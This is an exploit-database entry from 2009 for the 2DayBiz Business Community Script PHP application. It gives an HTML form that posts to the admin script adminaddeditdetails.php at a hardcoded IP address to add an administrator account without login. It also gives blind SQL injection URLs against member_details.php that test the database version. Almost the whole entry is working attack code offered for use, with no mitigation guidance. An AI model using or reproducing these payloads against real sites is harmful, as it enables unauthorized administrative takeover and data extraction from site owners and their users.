2DayBiz Business Community Script - Multiple Vulnerabilities

EDB-ID:

8689

Author:

TiGeR-Dz

Type:

webapps

Platform:

PHP

Published:

2009-05-14

-------------------------------------------------------------------------------------------------------------
2daybiz Business Community Script (adminaddeditdetails.php) Add Admin / Remote Blind SQL Injection Exploit 
----------------------------------------------------------------------------------------------------
Founder: TiGeR-Dz
Script:Business Community Script
Home:http://www.2daybiz.com/
Download:http://www.2daybiz.com/business_comm_download.html
--------------------------------------------------------------------------------------------------
1/Add Admin Exploit:
----------------------------------------------------------------
<p align="center">
  <body bgcolor="#000000">

  </p>

  <p>&nbsp;</p>
  <p><font size="5" color="#FF0000">CoD3d By </font>
  <font color="#FFFFFF" size="5">:TiGeR.dZ</font></p>
  <form id="form1" name="editinguser" method="post" action="http://98.131.92.231/products/businesscommunity/admin/adminaddeditdetails.php?adduser" onsubmit="return editvalidateform();">
  <table width="100%" border="0" align="center" cellpadding="5" cellspacing="0" class="blue_border">
  <tr>
  <td colspan="3"><div align="center" class="gblue_bg">
  <font size="5" color="#FF0000">Add 
  User </font> </div></td>
  </tr>
  <tr>
  <td colspan="3">&nbsp;</td>
  </tr>
  <tr>
  <td width="19%">&nbsp;</td>
  <td width="28%" align="left" class="yoda">
  <font color="#FF0000" size="4">Username</font></td>
  <td width="50%" align="left"><label>
  <input name="username" type="text" id="username" size="25" />
  </label> </td>
  </tr>
  <tr>
  <td class="yoda" width="19%">&nbsp;</td>
  <td align="left" class="yoda">
  <font color="#FF0000" size="4">Password</font></td>
  <td align="left"><label>
  <input name="password" type="password" id="password" size="25" />
  </label></td>
  </tr>
  <tr>
  <td class="yoda" width="19%">&nbsp;</td>
  <td align="left" class="yoda"> 
  <font color="#FF0000" size="4">Name </font> </td>
  <td align="left"><label>
  <input name="name" type="text" id="name" size="25" />
  </label></td>
  </tr>
  <tr>
  <td class="yoda" width="19%">&nbsp;</td>
  <td align="left" class="yoda">
  <font color="#FF0000" size="4">Email</font></td>
  <td align="left"><label>
  <input name="email" type="text" size="25" />
  </label></td>
  </tr>
  <tr>
  <td colspan="2" class="yoda">&nbsp;</td>
  <td>&nbsp;</td>
  </tr>
  <tr>
  <td colspan="3" class="yoda"><label>
  <div align="center">
  <input type="submit" name="Submit" value="Add User" />
  </div>
  </label></td>
  </tr>
   
  </html>
---------------------------------------------------------------------------------------------------------------------------------------------------
2/ Remote Blind SQL Injection Exploit:
------------------------------------------- 
Note: this gaps is Exist within the file of the control panel (adminaddeditdetails.php) :)
  
  1/http://98.131.92.231/products/businesscommunity/admin/member_details.php?mid=1+and+substring(@@version,1,1)=4 False

  2/http://98.131.92.231/products/businesscommunity/admin/member_details.php?mid=1+and+substring(@@version,1,1)=5 True
------------------------------------------------------------------------------------------------------------------------------------------
www.h4ckf0ru.com # 
-----------------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2009-05-14]